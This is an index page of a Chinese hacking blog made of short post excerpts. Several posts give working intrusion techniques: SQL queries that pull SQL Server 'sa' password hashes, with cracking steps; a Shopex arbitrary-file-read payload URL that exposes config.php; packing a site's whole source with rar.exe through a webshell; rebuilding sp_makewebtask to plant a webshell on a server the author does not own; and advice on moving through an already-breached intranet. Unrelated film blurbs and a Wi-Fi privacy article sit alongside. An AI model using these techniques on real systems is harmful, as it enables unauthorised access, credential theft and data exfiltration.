Chinadu's Blog

SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name='sa'
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in 'cain and abel' and then work the case sentive hash

SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
阅读全文...

腾讯微博：http://t.qq.com/chinadu
新浪微博：http://t.sina.com.cn/chinadu

另外要腾讯微博邀请码的，在这留言，留下邮箱有的话第一时间发送。

一、安装
1、准备：
1).最小的USB驱动器的容量4GB的USB,格式为FAT32的;
2).BT4正式版：
下载地址：http://www.remote-exploit.org/backtrack_download.html
3).U盘启动制作工具：unetbootin
下载地址：http://unetbootin.sourceforge.net/
注意：unetbootin可以下载windows版或者Linux版，请按照自己的操作系统下载
2、运行Unetbootin并选择bt4为bt4-pre-final.iso，选择USB驱动器号，并点击OK开始作一个可启动的USB驱动器:

附件:

阅读全文...

1、狙击生死线
剧情介绍：
退伍神射狙击手遭人陷害成了替罪羊，被当作刺杀总统的疑犯通缉！他决定重拾狙击，开始反击复仇！

========================================

2、双狙人1
剧情简介
老兵贝林格与年轻的情报员米勒前往巴拿马刺杀该国军阀阿尔赫兹，在丛林中远离后方支援，两人各显示其能。

========================================

3、双狙人2
海军陆战队军士长贝奇退伍后却一直不得志。军中希望他到巴尔干半岛枪杀一名叛军首领，派给他充当观测兵的却是年轻的军中死刑犯柯尔。两人顺利地完成任务后柯尔竟然意外遭敌方逮捕。他才发现自己的任务根本是个幌子……
========================================

4、双狙人3
剧情介绍：
狙击手比吉特身为美国海军陆战队最具传奇性的狙击手，是海军陆战队的绝密武器，但这次他的枪口却被逼瞄向他的一个朋友……

========================================
阅读全文...

4月23号的早上5点5分了，IP为：58.49.195.65 的这哥们还没睡。
他究竟在干什么呢？

后面我就不截出来了，在尝试了我的几个弱密码之后，终于以失败告终。

Chinadu在这里友情提示：58.49.195.65的哥们，身体重要，早上5点多了，您还没睡，小心强奸不成反被操。

rar.exe是什么？它就是大名鼎鼎的winrar自带的命令行解压程序。在提权中我们经常要下载各种敏感文件，比如:SU目录。你想一下，如果su目录文件这么多，难道你要一个个的下载？？这明显就很麻烦，有了rar.exe一切变的简单了！

好了现在来介绍它的用法吧！得到了Webshell后，最好自己传一个rar.exe，虽然program files目录有，但是有时执行不了。rar.exe体积200K，呵呵！将就下。在CMDSHELL执行:D:1Rar.exe a -k -r -s -m1 E:web1.rar E:web。我来介绍下吧,"D:1rar.exe"是你上传的rar.exe,后面参数我会给大家放在下面；"E:web1.rar"是你压缩的文件存放的位置(在shell中一定要选能写的目录);"E:web"是你要打包的目录。很简单吧？以后在没有得到服务器，大家可以尝试我介绍的方法，下载整站源码。
rar.exe参数:
阅读全文...

影响版本： Shopex V4.8.4 V4.8.5
漏洞描述： 文件过滤不严，导致任意文件读取漏洞。
测试代码：

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

可以连上数据库.
阅读全文...

1你的内网入口机器属于什么性质？例如：24小时运转的应用服务器、测试机器、员工办公机器、VPN？
根据你的回帖，可以得知，你目前既然已经拥有了数台内网服务器权限，那么应该是通过其内网反弹后门转发端口进入内网，我估计是应用服务器。而初期可能是通 过员工办公机器或者对方映射到公网上面的应用服务器进入内网的。

2此内网数据存储服务器属于几级内网？这个问题你未具体描述，因为往往会遇到1级、2级、3级甚至更深的类城域网结构。
这里假设你遇到的只是最初级的1级内网，既：内网可互通

3你目前行为的目的是什么？你描述说你需要将数据拷贝出来，但你又回帖说搞定了他们几台服务器，那么我的问题就是，根据你最后一次的回帖，不太明白你目前 的状况。A你无聊？B你还有其他目的？C你还没有搞定那台或数台数据储存服务器？
你不回答清楚，无法帮你参考啊。各种情况下，有不同的解决方式。
这里就仅认为你已经搞定数据储存服务器、并且只是基于成就感继续KO他们的服务器吧。
阅读全文...

windows 2003中的远程桌面功能非常方便，但是初始设置只允许2个用户同时登陆。有些时候因为我在公司连接登陆后断开，同事在家里用其他用户登陆后断开，当我再进行连接的时候，总是报错“终端服务超过最大连接数”。这时候我和同事都不能登陆，有没有什么办法可以达到以下几个目的中的一个：

　　1. 为账号设定权限，管理员登陆的时候强制注销多余的用户。
　　2. 管理员登陆的时候自动接管在其他地方断开的状态（本来这个功能具备，但有些时候不行）。
　　3. 不安装总段服务的时候增加连接数（不是临时授权）

　　通过以下方法来增加连接数:
阅读全文...

制作条件:

已经把BackTrack 4安装至硬盘,成功进入系统.磁盘有足够的空间.有linux基础.

接下来，开始制作属于自己的中文ISO。

准备工作:

先创建一个叫work的工作目录,然后把从官方下载回来的iso和定制BackTrack的脚本放到work目录里去.修改定制脚本里的btisoname变量为bt4-final.iso.

root@bt:~# cd ~

root@bt:~# mkdir work

root@bt:~# cp bt4-final.iso work

root@bt:~# cd work

root@bt:work# wget www.offensive-security.com/bt4-customise.sh

root@bt:work# chmod 755 bt4-customise.sh
阅读全文...

今天刚好发现有一个SA权限。服务器管理员将大部份扩展都删除了。最后自己重建sp_makewebtask存储才搞到一个webshell了。（重建办法，先找台正常主机，sp_helptext 'sp_makewebtask',将他的SQL语句重新拷到目标机器执行一次就行了）。

当然有了webshell，无法满足我们贪婪的欲望。开始测试提权。有serv-u，但是提权失败了。也许大家会说用back log来提权。但是那个太慢了，要重启机器，会影响对方业务，同时又会给对方留下不好的印像。有人也许会说用读取系统账号的注册表，导入导出，克隆账号，这个办法也可行，但由于并非黑对方主机，还是要保证对方系统的安整性比较好。（也许是心理因素，^_^)

最后只好试试沙盒模式。很多人SA直接用沙盒模式成功了好多机器，但我从来没实践过，也不太清楚成功率如何。只好拿他当回肉鸡尝试了。

阅读全文...

设想一下：你坐在一家咖啡馆，拿着一杯拿铁享受着无线上网的快乐，准备回顾销售策略和季度财务预测报告。首先你需要连接咖啡馆提供的免费Wi- Fi。然后将你的笔记本和放映机连起来，以便整个咖啡馆的人都可以看到，最后你发出去一些打印好的副本给其他人参考，这些里面含有机密的产品规格信息。这听起来可能有点可笑，但是如果你使用公共Wi-Fi而且没有采取适当的措施的话，那么你的商业机密就可能会被其他的“咖啡同胞”分享。

开放Wi-Fi无隐私可言

今天，大多数的科技用户都知道如何(以及为何)确保家庭无线路由器的安全。Windows 7和Vista在连接到未加密无线网络的时候都会弹出一个对话框提醒用户。

而在咖啡馆、机场休息室或图书馆人们频繁地不假思索地连接无线，尽管使用加密的连接查看比赛结果或航班状态是可以接受的，但是读取电邮或进行任 何Web活动等需要登录的做法，就好像你在人群中使用对讲机不安全。

那么为什么所有的企业不对他们Wi-Fi网络进行加密呢？答案就是IEEE 802.11设计规范的密钥系统太过复杂：如果对流量进行加密，网络所有者和管理者需要选择一个密码，也就是“网络密钥”。需要每个网络都有自己的密钥， 无论网络所有者选择了相对不安全、并很久未更新的WEP还是相对安全的WPA或WPA2，这个密钥都需要在所有的用户中共享。

在家中，你需要进行设置，然后将密码告诉你的家人，那么你们就可以在家中享受无忧的网上冲浪了。而在咖啡馆，咖啡师不得不将密码(或26位的十 六进制WEP密钥)告诉给每位客人，可能他们就可以联网了。在这种情况下没有什么比空密码更简便了。

然而，就算网络已经加密了，你可能也不是绝对安全的。一旦你的计算机知道了密钥，只有对于那些和你不在同一网络的人来说，你的信息才是安全的; 所有“咖啡同胞”都可以看到你的流量，因为他们使用的是同一个密钥。

阅读全文...